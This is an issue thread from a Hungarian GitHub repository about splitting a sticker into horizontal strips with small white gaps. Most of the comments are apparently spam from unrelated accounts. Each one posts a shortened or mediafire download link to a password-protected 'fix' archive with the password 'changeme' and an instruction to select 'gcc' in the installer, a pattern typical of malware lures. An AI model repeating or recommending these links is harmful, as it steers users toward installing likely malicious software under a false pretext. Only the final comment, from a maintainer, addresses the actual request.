### ISSUE TITLE
Lépcsőmatrica

### ISSUE THREAD

**Issue by Bende126** [SCH-KB-PR/kbpr-ps#9]
**A probléma, mely felvetette az ötletet**
Lépcsőmatrica

**A megoldásod, ötleteid**
Fel kell darabolni vízszintes csíkokra egy matricát, úgy h csíkok között alul és felül 2mm fehér hely marad.

**Miért lenne jó?**
Kevesebb photoshop szopás

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gilgames32** [comment]
majd lehet csinálok makrót rá bár kinda nincs értelme, kézzel egyszerűbb, visszatérhetünk rá megemelkedett igények esetén
